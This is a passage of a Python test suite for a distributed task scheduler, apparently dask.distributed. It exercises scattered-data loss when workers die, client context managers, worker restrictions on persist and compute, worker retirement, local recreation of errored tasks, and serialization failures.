    """Async get_versions(check=True) completes without raising."""
    await c.get_versions(check=True)
def test_threaded_get_within_distributed(c):
    """Local dask schedulers (sync, multiprocessing, threaded) can be used
    from inside a task running on a distributed worker."""
    import dask.multiprocessing
    for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
        def f():
            return get({"x": (lambda: 1,)}, "x")
        future = c.submit(f)
        assert future.result() == 1
@gen_cluster(client=True)
async def test_lose_scattered_data(c, s, a, b):
    """Scattered data with a single replica is cancelled when its worker dies."""
    [x] = await c.scatter([1], workers=a.address)
    await a.close()
    await asyncio.sleep(0.1)
    assert x.status == "cancelled"
    assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_partially_lose_scattered_data(e, s, a, b, c):
    """Replicated scattered data survives the loss of one holding worker."""
    x = await e.scatter(1, workers=a.address)
    await e.replicate(x, n=2)
    await a.close()
    await asyncio.sleep(0.1)
    assert x.status == "finished"
    assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
async def test_scatter_compute_lose(c, s, a, b):
    """Losing a scattered input mid-computation cancels the dependent task,
    while independent tasks finish normally."""
    [x] = await c.scatter([[1, 2, 3, 4]], workers=a.address)
    y = c.submit(inc, 1, workers=b.address)
    z = c.submit(slowadd, x, y, delay=0.2)
    await asyncio.sleep(0.1)
    await a.close()
    with pytest.raises(CancelledError):
        await wait(z)
    assert x.status == "cancelled"
    assert y.status == "finished"
    assert z.status == "cancelled"
@gen_cluster(client=True)
async def test_scatter_compute_store_lose(c, s, a, b):
    """
    Create irreplaceable data on one machine,
    cause a dependent computation to occur on another and complete
    Kill the machine with the irreplaceable data. What happens to the complete
    result? How about after it GCs and tries to come back?
    """
    x = await c.scatter(1, workers=a.address)
    # xx and z depend on x; z's result lives on the surviving worker b
    xx = c.submit(inc, x, workers=a.address)
    y = c.submit(inc, 1)
    z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
    await wait(z)
    await a.close()
    # x had its only replica on a, so its status should leave "finished"
    while x.status == "finished":
        await asyncio.sleep(0.01)
    # assert xx.status == 'finished'
    assert y.status == "finished"
    assert z.status == "finished"
    # z's completed result is still usable for further computation
    zz = c.submit(inc, z)
    await wait(zz)
    zkey = z.key
    del z
    # dropping the last client reference releases the task on the scheduler
    while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
        await asyncio.sleep(0.01)
    xxkey = xx.key
    del xx
    while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
        await asyncio.sleep(0.01)
@gen_cluster(client=True)
async def test_scatter_compute_store_lose_processing(c, s, a, b):
    """
    Create irreplaceable data on one machine,
    cause a dependent computation to occur on another and complete
    Kill the machine with the irreplaceable data. What happens to the complete
    result? How about after it GCs and tries to come back?
    """
    [x] = await c.scatter([1], workers=a.address)
    y = c.submit(slowinc, x, delay=0.2)
    z = c.submit(inc, y)
    await asyncio.sleep(0.1)
    # kill the only holder of x while y is still being processed
    await a.close()
    while x.status == "finished":
        await asyncio.sleep(0.01)
    assert y.status == "cancelled"
    assert z.status == "cancelled"
@gen_cluster()
async def test_serialize_future(s, a, b):
    """Unpickling a future re-binds it to whichever client is current at load
    time (via as_current or temp_default_client)."""
    c1 = await Client(s.address, asynchronous=True)
    c2 = await Client(s.address, asynchronous=True)
    future = c1.submit(lambda: 1)
    result = await future
    for ci in (c1, c2):
        for ctxman in ci.as_current, lambda: temp_default_client(ci):
            with ctxman():
                future2 = pickle.loads(pickle.dumps(future))
                assert future2.client is ci
                assert stringify(future2.key) in ci.futures
                result2 = await future2
                assert result == result2
    await c1.close()
    await c2.close()
@gen_cluster()
async def test_temp_default_client(s, a, b):
    """temp_default_client() overrides the default client within its context;
    an explicit argument to default_client() still wins."""
    c1 = await Client(s.address, asynchronous=True)
    c2 = await Client(s.address, asynchronous=True)
    with temp_default_client(c1):
        assert default_client() is c1
        assert default_client(c2) is c2
    with temp_default_client(c2):
        assert default_client() is c2
        assert default_client(c1) is c1
    await c1.close()
    await c2.close()
@gen_cluster(client=True)
async def test_as_current(c, s, a, b):
    """Client.as_current() shadows the global default; Client.current(
    allow_global=False) raises when no as_current context is active."""
    c1 = await Client(s.address, asynchronous=True)
    c2 = await Client(s.address, asynchronous=True)
    with temp_default_client(c):
        assert Client.current() is c
        with pytest.raises(ValueError):
            Client.current(allow_global=False)
        with c1.as_current():
            assert Client.current() is c1
            assert Client.current(allow_global=True) is c1
        with c2.as_current():
            assert Client.current() is c2
            assert Client.current(allow_global=True) is c2
    await c1.close()
    await c2.close()
def test_as_current_is_thread_local(s):
    """Two threads can each hold a different as_current() client at once."""
    # The four locks form a hand-rolled barrier: run1 and run2 ping-pong on
    # l1/l2 to ensure both are inside as_current() before asserting, then on
    # l3/l4 to ensure neither exits before the other has asserted.
    l1 = threading.Lock()
    l2 = threading.Lock()
    l3 = threading.Lock()
    l4 = threading.Lock()
    l1.acquire()
    l2.acquire()
    l3.acquire()
    l4.acquire()
    def run1():
        with Client(s["address"]) as c:
            with c.as_current():
                l1.acquire()
                l2.release()
                try:
                    # This line runs only when both run1 and run2 are inside the
                    # context manager
                    assert Client.current(allow_global=False) is c
                finally:
                    l3.acquire()
                    l4.release()
    def run2():
        with Client(s["address"]) as c:
            with c.as_current():
                l1.release()
                l2.acquire()
                try:
                    # This line runs only when both run1 and run2 are inside the
                    # context manager
                    assert Client.current(allow_global=False) is c
                finally:
                    l3.release()
                    l4.acquire()
    t1 = threading.Thread(target=run1)
    t2 = threading.Thread(target=run2)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
@gen_cluster()
async def test_as_current_is_task_local(s, a, b):
    """Two concurrent asyncio tasks can each hold a different as_current()
    client (the context is task-local, not loop-global)."""
    # Async analogue of test_as_current_is_thread_local: four locks form a
    # barrier so both tasks assert while both are inside as_current().
    l1 = asyncio.Lock()
    l2 = asyncio.Lock()
    l3 = asyncio.Lock()
    l4 = asyncio.Lock()
    await l1.acquire()
    await l2.acquire()
    await l3.acquire()
    await l4.acquire()
    async def run1():
        async with Client(s.address, asynchronous=True) as c:
            with c.as_current():
                await l1.acquire()
                l2.release()
                try:
                    # This line runs only when both run1 and run2 are inside the
                    # context manager
                    assert Client.current(allow_global=False) is c
                finally:
                    await l3.acquire()
                    l4.release()
    async def run2():
        async with Client(s.address, asynchronous=True) as c:
            with c.as_current():
                l1.release()
                await l2.acquire()
                try:
                    # This line runs only when both run1 and run2 are inside the
                    # context manager
                    assert Client.current(allow_global=False) is c
                finally:
                    l3.release()
                    await l4.acquire()
    await asyncio.gather(run1(), run2())
@nodebug  # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate(e, s, a, b, c):
    """dask.annotate(workers=..., allow_other_workers=...) restrictions are
    honored by persist()."""
    with dask.annotate(workers=a.address, allow_other_workers=False):
        L1 = [delayed(inc)(i) for i in range(4)]
    with dask.annotate(workers=b.address, allow_other_workers=False):
        total = delayed(sum)(L1)
    with dask.annotate(workers=c.address, allow_other_workers=True):
        L2 = [delayed(add)(i, total) for i in L1]
    with dask.annotate(workers=b.address, allow_other_workers=True):
        total2 = delayed(sum)(L2)
    # TODO: once annotations are faithfully forwarded upon graph optimization,
    # we shouldn't need to disable that here.
    out = e.persist(L1 + L2 + [total, total2], optimize_graph=False)
    await wait(out)
    assert all(v.key in a.data for v in L1)
    assert total.key in b.data
    # only the allow_other_workers=True annotations become loose restrictions
    assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate2(e, s, a, b, c):
    """A callable workers= annotation maps every key to a worker without
    mutating the collections' own layer annotations."""
    def key_to_worker(key):
        return a.address
    L1 = [delayed(inc)(i) for i in range(4)]
    for x in L1:
        assert all(layer.annotations is None for layer in x.dask.layers.values())
    with dask.annotate(workers=key_to_worker):
        out = e.persist(L1, optimize_graph=False)
        await wait(out)
    # persisting must not have written annotations back into the inputs
    for x in L1:
        assert all(layer.annotations is None for layer in x.dask.layers.values())
    for v in L1:
        assert s.worker_restrictions[v.key] == {a.address}
@nodebug  # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers(e, s, a, b, c):
    """persist(workers=..., allow_other_workers=True) applies a loose
    {a, b} restriction to every persisted key and never includes c."""
    L1 = [delayed(inc)(i) for i in range(4)]
    total = delayed(sum)(L1)
    L2 = [delayed(add)(i, total) for i in L1]
    total2 = delayed(sum)(L2)
    out = e.persist(
        L1 + L2 + [total, total2],
        workers=[a.address, b.address],
        allow_other_workers=True,
    )
    await wait(out)
    for v in L1 + L2 + [total, total2]:
        assert s.worker_restrictions[v.key] == {a.address, b.address}
    # BUG FIX: iterate the restriction *sets* (.values()), not the dict itself.
    # Iterating the dict yields task-key strings, so the membership test was a
    # substring check against key names and trivially passed.
    assert not any(c.address in r for r in s.worker_restrictions.values())
    assert s.loose_restrictions == {total.key, total2.key} | {v.key for v in L1 + L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers_annotate(e, s, a, b, c):
    """dask.annotate(workers=...) restrictions are honored by compute()."""
    with dask.annotate(workers=a.address, allow_other_workers=True):
        L1 = [delayed(inc)(i) for i in range(4)]
    with dask.annotate(workers=b.address, allow_other_workers=True):
        total = delayed(sum)(L1)
    with dask.annotate(workers=[c.address]):
        L2 = [delayed(add)(i, total) for i in L1]
    # TODO: once annotations are faithfully forwarded upon graph optimization,
    # we shouldn't need to disable that here.
    out = e.compute(L1 + L2 + [total], optimize_graph=False)
    await wait(out)
    for v in L1:
        assert s.worker_restrictions[v.key] == {a.address}
    for v in L2:
        assert s.worker_restrictions[v.key] == {c.address}
    assert s.worker_restrictions[total.key] == {b.address}
    # L2 had no allow_other_workers, so only L1 and total are loose
    assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers(e, s, a, b, c):
    """compute(workers=..., allow_other_workers=True) applies a loose
    {a, b} restriction to every computed key and never includes c."""
    L1 = [delayed(inc)(i) for i in range(4)]
    total = delayed(sum)(L1)
    L2 = [delayed(add)(i, total) for i in L1]
    out = e.compute(
        L1 + L2 + [total],
        workers=[a.address, b.address],
        allow_other_workers=True,
    )
    await wait(out)
    for v in L1 + L2 + [total]:
        assert s.worker_restrictions[v.key] == {a.address, b.address}
    # BUG FIX: iterate the restriction *sets* (.values()), not the dict itself.
    # Iterating the dict yields task-key strings, so the membership test was a
    # substring check against key names and trivially passed.
    assert not any(c.address in r for r in s.worker_restrictions.values())
    assert s.loose_restrictions == {total.key} | {v.key for v in L1 + L2}
@gen_cluster(client=True)
async def test_compute_nested_containers(c, s, a, b):
    """compute() traverses dicts/lists that mix collections and plain values."""
    da = pytest.importorskip("dask.array")
    np = pytest.importorskip("numpy")
    x = da.ones(10, chunks=(5,)) + 1
    future = c.compute({"x": [x], "y": 123})
    result = await future
    assert isinstance(result, dict)
    assert (result["x"][0] == np.ones(10) + 1).all()
    assert result["y"] == 123
@gen_cluster(client=True)
async def test_scatter_type(c, s, a, b):
    """Futures returned by scatter record the type of the scattered object."""
    [future] = await c.scatter([1])
    assert future.type == int
    d = await c.scatter({"x": 1.0})
    assert d["x"].type == float
@gen_cluster(client=True)
async def test_retire_workers_2(c, s, a, b):
    """retire_workers moves uniquely-held data off the retired worker first."""
    [x] = await c.scatter([1], workers=a.address)
    await s.retire_workers(workers=[a.address])
    assert b.data == {x.key: 1}
    assert s.who_has == {x.key: {b.address}}
    assert s.has_what == {b.address: {x.key}}
    assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_retire_many_workers(c, s, *workers):
    """Retiring 7 of 10 workers preserves all scattered data and rebalances it
    across the survivors."""
    futures = await c.scatter(list(range(100)))
    await s.retire_workers(workers=[w.address for w in workers[:7]])
    results = await c.gather(futures)
    assert results == list(range(100))
    while len(s.workers) != 3:
        await asyncio.sleep(0.01)
    assert len(s.has_what) == len(s.nthreads) == 3
    assert all(future.done() for future in futures)
    assert all(s.tasks[future.key].state == "memory" for future in futures)
    # data should end up roughly evenly spread, not piled on one worker
    for w, keys in s.has_what.items():
        assert 15 < len(keys) < 50
@gen_cluster(
    client=True,
    nthreads=[("127.0.0.1", 3)] * 2,
    config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_weight_occupancy_against_data_movement(c, s, a, b):
    """Task placement weighs compute occupancy against the cost of moving the
    tasks' (differently sized) scattered dependencies."""
    # very large callback_time effectively disables the periodic work-stealing
    # callback for the duration of the test (NOTE(review): presumably -- confirm)
    s.extensions["stealing"]._pc.callback_time = 1000000
    def f(x, y=0, z=0):
        sleep(0.01)
        return x
    # y (larger payload) lives on a; z (small) lives on b
    y = await c.scatter([[1, 2, 3, 4]], workers=[a.address])
    z = await c.scatter([1], workers=[b.address])
    futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
    await wait(futures)
    assert sum(f.key in a.data for f in futures) >= 2
    assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(
    client=True,
    nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)],
    config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_distribute_tasks_by_nthreads(c, s, a, b):
    """A worker with many more threads receives proportionally more tasks."""
    # very large callback_time effectively disables the periodic work-stealing
    # callback for the duration of the test (NOTE(review): presumably -- confirm)
    s.extensions["stealing"]._pc.callback_time = 1000000
    def f(x, y=0):
        sleep(0.01)
        return x
    y = await c.scatter([1], broadcast=True)
    futures = c.map(f, range(20), y=y)
    await wait(futures)
    assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_add_done_callback(c, s, a, b):
    """add_done_callback fires for finished, erred, slow, and already-done
    futures, and callbacks may register further callbacks."""
    S = set()
    def f(future):
        future.add_done_callback(g)
    def g(future):
        S.add((future.key, future.status))
    u = c.submit(inc, 1, key="u")
    v = c.submit(throws, "hello", key="v")
    w = c.submit(slowinc, 2, delay=0.3, key="w")
    x = c.submit(inc, 3, key="x")
    u.add_done_callback(f)
    v.add_done_callback(f)
    w.add_done_callback(f)
    await wait((u, v, w, x))
    # x is already done when its callback is added; the callback must still fire
    x.add_done_callback(f)
    while len(S) < 4:
        await asyncio.sleep(0.01)
    assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
async def test_normalize_collection(c, s, a, b):
    """normalize_collection substitutes already-persisted sub-keys with
    futures, shrinking the graph."""
    x = delayed(inc)(1)
    y = delayed(inc)(x)
    z = delayed(inc)(y)
    yy = c.persist(y)
    zz = c.normalize_collection(z)
    assert len(z.dask) == len(y.dask) + 1
    assert isinstance(zz.dask[y.key], Future)
    assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
async def test_normalize_collection_dask_array(c, s, a, b):
    """normalize_collection on a dask array swaps persisted chunks for futures
    without mutating the input graph, and computes the same result."""
    da = pytest.importorskip("dask.array")
    x = da.ones(10, chunks=(5,))
    y = x + 1
    yy = c.persist(y)
    z = y.sum()
    zdsk = dict(z.dask)
    zz = c.normalize_collection(z)
    assert z.dask == zdsk  # do not mutate input
    assert len(z.dask) > len(zz.dask)
    assert any(isinstance(v, Future) for v in zz.dask.values())
    # the substituted futures must correspond to the persisted keys
    for k, v in yy.dask.items():
        assert zz.dask[k].key == v.key
    result1 = await c.compute(z)
    result2 = await c.compute(zz)
    assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
    """Regression test: normalize_collection while futures are being released
    must not leave dangling future references in the graph."""
    da = pytest.importorskip("dask.array")
    x = da.arange(2 ** 20, chunks=2 ** 10)
    y = x.persist()
    wait(y)
    sol = y.sum().compute()
    # Start releasing futures
    del y
    # Try to reuse futures. Previously this was a race condition,
    # and the call to `.compute()` would error out due to missing
    # futures on the scheduler at compute time.
    normalized = c.normalize_collection(x)
    res = normalized.sum().compute()
    assert res == sol
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
@gen_cluster(client=True)
async def test_auto_normalize_collection(c, s, a, b):
    """With the _optimize_insert_futures optimization enabled, persisted
    intermediates are reused so dependent computations finish quickly."""
    da = pytest.importorskip("dask.array")
    x = da.ones(10, chunks=5)
    assert len(x.dask) == 2
    with dask.config.set(optimizations=[c._optimize_insert_futures]):
        y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
        yy = c.persist(y)
        await wait(yy)
        # each slowinc takes ~1s, so finishing well under 1s implies the
        # persisted results were reused rather than recomputed
        start = time()
        future = c.compute(y.sum())
        await future
        end = time()
        assert end - start < 1
        start = time()
        z = c.persist(y + 1)
        await wait(z)
        end = time()
        assert end - start < 1
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
def test_auto_normalize_collection_sync(c):
    """Synchronous variant of test_auto_normalize_collection: persisted
    intermediates are reused under the optimization hook."""
    da = pytest.importorskip("dask.array")
    x = da.ones(10, chunks=5)
    y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
    yy = c.persist(y)
    wait(yy)
    with dask.config.set(optimizations=[c._optimize_insert_futures]):
        # fast completion implies persisted chunks were reused, not recomputed
        start = time()
        y.sum().compute()
        end = time()
        assert end - start < 1
def assert_no_data_loss(scheduler):
    """Fail if the scheduler's transition log shows lost data.

    A task that moved from "memory" to "released" while simultaneously being
    recommended back to "waiting" means its result was dropped and must be
    recomputed -- i.e. data loss.
    """
    for entry in scheduler.transition_log:
        key, start, finish, recommendations = entry[0], entry[1], entry[2], entry[3]
        if (start, finish) == ("memory", "released"):
            offenders = [
                rec_key
                for rec_key, rec_state in recommendations.items()
                if rec_key == key and rec_state == "waiting"
            ]
            assert not offenders
@gen_cluster(client=True)
async def test_interleave_computations(c, s, a, b):
    """Stages of a layered graph (xs -> ys -> zs) complete in interleaved
    order rather than strictly stage by stage."""
    import distributed
    # NOTE(review): debugging hook; leaves distributed.g set after the test
    distributed.g = s
    xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
    ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
    zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
    total = delayed(sum)(zs)
    future = c.compute(total)
    done = ("memory", "released")
    await asyncio.sleep(0.1)
    x_keys = [x.key for x in xs]
    y_keys = [y.key for y in ys]
    z_keys = [z.key for z in zs]
    while not s.tasks or any(w.processing for w in s.workers.values()):
        await asyncio.sleep(0.05)
        x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
        y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
        z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
        # later stages can never be ahead, but must not lag far behind either
        assert x_done >= y_done >= z_done
        assert x_done < y_done + 10
        assert y_done < z_done + 10
    assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True)
async def test_interleave_computations_map(c, s, a, b):
    """Map-based variant of test_interleave_computations (currently skipped:
    scheduling now prefers FIFO order)."""
    xs = c.map(slowinc, range(30), delay=0.02)
    ys = c.map(slowdec, xs, delay=0.02)
    zs = c.map(slowadd, xs, ys, delay=0.02)
    done = ("memory", "released")
    x_keys = [x.key for x in xs]
    y_keys = [y.key for y in ys]
    z_keys = [z.key for z in zs]
    while not s.tasks or any(w.processing for w in s.workers.values()):
        await asyncio.sleep(0.05)
        x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
        y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
        z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
        assert x_done >= y_done >= z_done
        assert x_done < y_done + 10
        assert y_done < z_done + 10
@gen_cluster(client=True)
async def test_scatter_dict_workers(c, s, a, b):
    """Scattering a dict with a workers= list lands the data on one of them."""
    await c.scatter({"a": 10}, workers=[a.address, b.address])
    assert any("a" in worker.data for worker in (a, b))
@pytest.mark.slow
@gen_test(timeout=180)
async def test_client_timeout():
    """A client started before its scheduler eventually connects once the
    scheduler comes up on the expected port."""
    c = Client("127.0.0.1:57484", asynchronous=True)
    s = Scheduler(loop=c.loop, port=57484, dashboard_address=":0")
    # let the client retry against the not-yet-started scheduler
    await asyncio.sleep(4)
    try:
        await s
    except OSError:  # port in use
        await c.close()
        return
    try:
        await c
        await c.close()
    finally:
        await s.close()
@gen_cluster(client=True)
async def test_submit_list_kwargs(c, s, a, b):
    """Futures inside a list keyword argument are resolved before the call."""
    futures = await c.scatter([1, 2, 3])
    def f(L=None):
        return sum(L)
    future = c.submit(f, L=futures)
    result = await future
    assert result == 1 + 2 + 3
@gen_cluster(client=True)
async def test_map_list_kwargs(c, s, a, b):
    """Futures inside a list keyword argument are resolved for every map call."""
    futures = await c.scatter([1, 2, 3])
    def f(i, L=None):
        return i + sum(L)
    futures = c.map(f, range(10), L=futures)
    results = await c.gather(futures)
    assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
async def test_dont_clear_waiting_data(c, s, a, b):
    """Data still needed by a waiting task survives its own future being
    garbage collected."""
    x = await c.scatter(1)
    y = c.submit(slowinc, x, delay=0.5)
    while y.key not in s.tasks:
        await asyncio.sleep(0.01)
    key = x.key
    del x
    for i in range(5):
        assert s.waiting_data[key]
        await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_recreate_error_delayed(c, s, a, b):
    """The components of an errored delayed computation can be fetched and
    re-raise the original error locally."""
    x0 = delayed(dec)(2)
    y0 = delayed(dec)(1)
    x = delayed(div)(1, x0)
    y = delayed(div)(1, y0)  # div(1, 0) -> the erroring task
    tot = delayed(sum)(x, y)
    f = c.compute(tot)
    assert f.status == "pending"
    error_f = await c._get_errored_future(f)
    function, args, kwargs = await c._get_components_from_future(error_f)
    assert f.status == "error"
    assert function.__name__ == "div"
    assert args == (1, 0)
    with pytest.raises(ZeroDivisionError):
        function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_futures(c, s, a, b):
    """Same as test_recreate_error_delayed but built from plain futures."""
    x0 = c.submit(dec, 2)
    y0 = c.submit(dec, 1)
    x = c.submit(div, 1, x0)
    y = c.submit(div, 1, y0)  # div(1, 0) -> the erroring task
    tot = c.submit(sum, x, y)
    f = c.compute(tot)
    assert f.status == "pending"
    error_f = await c._get_errored_future(f)
    function, args, kwargs = await c._get_components_from_future(error_f)
    assert f.status == "error"
    assert function.__name__ == "div"
    assert args == (1, 0)
    with pytest.raises(ZeroDivisionError):
        function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_collection(c, s, a, b):
    """Errored bag and dataframe computations expose their failing component
    for local re-execution (both compute and persist paths)."""
    b = db.range(10, npartitions=4)
    b = b.map(lambda x: 1 / x)  # 1/0 in the first partition errs
    b = b.persist()
    f = c.compute(b)
    error_f = await c._get_errored_future(f)
    function, args, kwargs = await c._get_components_from_future(error_f)
    with pytest.raises(ZeroDivisionError):
        function(*args, **kwargs)
    dd = pytest.importorskip("dask.dataframe")
    import pandas as pd
    df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
    def make_err(x):
        # because pandas would happily work with NaN
        if x == 0:
            raise ValueError
        return x
    df2 = df.a.map(make_err)
    f = c.compute(df2)
    error_f = await c._get_errored_future(f)
    function, args, kwargs = await c._get_components_from_future(error_f)
    with pytest.raises(ValueError):
        function(*args, **kwargs)
    # with persist
    df3 = c.persist(df2)
    error_f = await c._get_errored_future(df3)
    function, args, kwargs = await c._get_components_from_future(error_f)
    with pytest.raises(ValueError):
        function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_array(c, s, a, b):
    """The recovered components of an errored array computation carry the
    actual array data as arguments."""
    da = pytest.importorskip("dask.array")
    pytest.importorskip("scipy")
    z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
    zz = z.persist()
    error_f = await c._get_errored_future(zz)
    function, args, kwargs = await c._get_components_from_future(error_f)
    assert "0.,0.,0." in str(args).replace(" ", "")  # args contain actual arrays
def test_recreate_error_sync(c):
    """recreate_error_locally re-raises the remote error in this process."""
    x0 = c.submit(dec, 2)
    y0 = c.submit(dec, 1)
    x = c.submit(div, 1, x0)
    y = c.submit(div, 1, y0)  # div(1, 0) -> the erroring task
    tot = c.submit(sum, x, y)
    f = c.compute(tot)
    with pytest.raises(ZeroDivisionError):
        c.recreate_error_locally(f)
    assert f.status == "error"
def test_recreate_error_not_error(c):
    """recreate_error_locally on a successful future raises ValueError."""
    f = c.submit(dec, 2)
    with pytest.raises(ValueError, match="No errored futures passed"):
        c.recreate_error_locally(f)
@gen_cluster(client=True)
async def test_recreate_task_delayed(c, s, a, b):
    """The components of a successful delayed computation can be fetched and
    re-run locally with the same result."""
    x0 = delayed(dec)(2)
    y0 = delayed(dec)(2)
    x = delayed(div)(1, x0)
    y = delayed(div)(1, y0)
    tot = delayed(sum)([x, y])
    f = c.compute(tot)
    assert f.status == "pending"
    function, args, kwargs = await c._get_components_from_future(f)
    assert f.status == "finished"
    assert function.__name__ == "sum"
    assert args == ([1, 1],)
    assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_futures(c, s, a, b):
    """Same as test_recreate_task_delayed but built from plain futures."""
    x0 = c.submit(dec, 2)
    y0 = c.submit(dec, 2)
    x = c.submit(div, 1, x0)
    y = c.submit(div, 1, y0)
    tot = c.submit(sum, [x, y])
    f = c.compute(tot)
    assert f.status == "pending"
    function, args, kwargs = await c._get_components_from_future(f)
    assert f.status == "finished"
    assert function.__name__ == "sum"
    assert args == ([1, 1],)
    assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_collection(c, s, a, b):
    """Components of successful bag/dataframe computations can be fetched and
    re-executed locally; persisted collections must go through compute first."""
    b = db.range(10, npartitions=4)
    b = b.map(lambda x: int(3628800 / (x + 1)))
    b = b.persist()
    f = c.compute(b)
    function, args, kwargs = await c._get_components_from_future(f)
    assert function(*args, **kwargs) == [
        3628800,
        1814400,
        1209600,
        907200,
        725760,
        604800,
        518400,
        453600,
        403200,
        362880,
    ]
    dd = pytest.importorskip("dask.dataframe")
    import pandas as pd
    df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
    df2 = df.a.map(lambda x: x + 1)
    f = c.compute(df2)
    function, args, kwargs = await c._get_components_from_future(f)
    expected = pd.DataFrame({"a": [1, 2, 3, 4, 5]})["a"]
    assert function(*args, **kwargs).equals(expected)
    # with persist
    df3 = c.persist(df2)
    # recreate_task_locally only works with futures
    with pytest.raises(AttributeError):
        function, args, kwargs = await c._get_components_from_future(df3)
    f = c.compute(df3)
    function, args, kwargs = await c._get_components_from_future(f)
    assert function(*args, **kwargs).equals(expected)
@gen_cluster(client=True)
async def test_recreate_task_array(c, s, a, b):
    """Components of a successful array computation re-run locally."""
    da = pytest.importorskip("dask.array")
    z = (da.zeros((10, 10), chunks=10) + 1).sum()
    f = c.compute(z)
    function, args, kwargs = await c._get_components_from_future(f)
    assert function(*args, **kwargs) == 100
def test_recreate_task_sync(c):
    """recreate_task_locally re-runs a finished task in this process."""
    x0 = c.submit(dec, 2)
    y0 = c.submit(dec, 2)
    x = c.submit(div, 1, x0)
    y = c.submit(div, 1, y0)
    tot = c.submit(sum, [x, y])
    f = c.compute(tot)
    assert c.recreate_task_locally(f) == 2
@gen_cluster(client=True)
async def test_retire_workers(c, s, a, b):
    """Client.retire_workers(close_workers=True) removes and shuts the worker."""
    assert set(s.workers) == {a.address, b.address}
    await c.retire_workers(workers=[a.address], close_workers=True)
    assert set(s.workers) == {b.address}
    while a.status != Status.closed:
        await asyncio.sleep(0.01)
class MyException(Exception):
    """Marker exception raised deliberately by the (de)serialization tests."""
@gen_cluster(client=True)
async def test_robust_unserializable(c, s, a, b):
    """A submit() whose argument fails to pickle raises locally and leaves
    the cluster fully usable."""
    class Foo:
        def __getstate__(self):
            raise MyException()
    with pytest.raises(MyException):
        future = c.submit(identity, Foo())
    futures = c.map(inc, range(10))
    results = await c.gather(futures)
    assert results == list(map(inc, range(10)))
    assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable(c, s, a, b):
    """An argument that fails to unpickle on the worker errs the future but
    leaves the cluster fully usable."""
    class Foo:
        def __getstate__(self):
            return 1
        def __setstate__(self, state):
            raise MyException("hello")
    future = c.submit(identity, Foo())
    with pytest.raises(MyException):
        await future
    futures = c.map(inc, range(10))
    results = await c.gather(futures)
    assert results == list(map(inc, range(10)))
    assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable_function(c, s, a, b):
    """A *function* that fails to unpickle on the worker errs the future but
    leaves the cluster fully usable."""
    class Foo:
        def __getstate__(self):
            return 1
        def __setstate__(self, state):
            raise MyException("hello")
        def __call__(self, *args):
            return 1
    future = c.submit(Foo(), 1)
    with pytest.raises(MyException):
        await future
    futures = c.map(inc, range(10))
    results = await c.gather(futures)
    assert results == list(map(inc, range(10)))
    assert a.data and b.data
@gen_cluster(client=True)
async def test_fire_and_forget(c, s, a, b):
    """fire_and_forget keeps a task alive without a client-held future, then
    lets it be cleaned up once finished."""
    future = c.submit(slowinc, 1, delay=0.1)
    import distributed
    def f(x):
        distributed.foo = 123
    try:
        fire_and_forget(c.submit(f, future))
        # observe the side effect of f on the (in-process) worker
        while not hasattr(distributed, "foo"):
            await asyncio.sleep(0.01)
        assert distributed.foo == 123
    finally:
        del distributed.foo
    # only the explicitly held future should remain on the scheduler
    while len(s.tasks) > 1:
        await asyncio.sleep(0.01)
    assert set(s.who_wants) == {future.key}
    assert set(s.tasks) == {future.key}
